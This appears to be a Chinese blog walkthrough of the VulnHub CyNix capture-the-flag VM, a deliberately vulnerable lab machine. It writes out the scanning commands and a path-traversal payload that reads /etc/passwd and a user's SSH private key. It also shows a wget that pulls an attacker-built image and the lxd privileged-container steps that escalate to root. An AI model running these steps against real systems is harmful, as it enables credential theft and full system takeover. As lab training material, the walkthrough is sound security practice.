本周末实践的是vulnhub的CyNix镜像,这个比较难,只能跟着人家的writeup走,
下载地址,https://download.vulnhub.com/cynix/CyNix.ova,
用workstation导入出错,改用virtualbox导入成功,
老规矩,先做地址扫描,
sudo netdiscover -r 192.168.56.0/24,
按照经验,192.168.56.102是靶机,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.56.102,
有http服务,用dirbuster做目录爆破,
浏览器访问http://192.168.56.102/lavalamp,在页面源码里找到个contactform.js,又在contactform.js源码里找到个canyoubypassme.php,
浏览器访问http://192.168.56.102/lavalamp/canyoubypassme.php,
在页面源码里找到opacity: 0.0,F12切到inspect模式,改成opacity: 1.0,
这就能看到输入框了,随便输入个数字1,用Burp Suite看到存在本地文件包含的漏洞点,
注入../../../etc/passwd,查看到passwd文件内容,
注意到ford账户,猜测能够ssh公钥认证登录,
注入../../../home/ford/.ssh/id_rsa,拿到密钥文件内容,
新建文件放到kali攻击机上,注意给文件权限,chmod 700 key,
注意到之前端口扫描出来的ssh端口是6688,
指定密钥文件和端口登录,ssh -i key [email protected] -p 6688,
不是root,需要提权,这里用的是lxc的提权方法,
kali攻击机上下载制作lxc提权镜像,
git clone https://github.com/saghul/lxd-alpine-builder.git,
cd lxd-alpine-builder,
切到root,./build-alpine,
kali攻击机上开启http下载服务,python -m SimpleHTTPServer,
靶机上下载lxc镜像,wget http://192.168.56.105:8000/alpine-v3.14-x86_64-20210724_2139.tar.gz,
靶机上导入lxc镜像并查看,
lxc image import ./alpine-v3.14-x86_64-20210724_2139.tar.gz --alias myimage,
lxc image list,
靶机上创建lxc实例并配置后启动,
lxc init myimage ignite -c security.privileged=true,
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true,
lxc start ignite,
靶机上进入lxc实例并查看,lxc exec ignite /bin/sh,id,是root,没问题,
本文始发于微信公众号(云计算和网络安全技术实践):vulnhub之CyNix的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论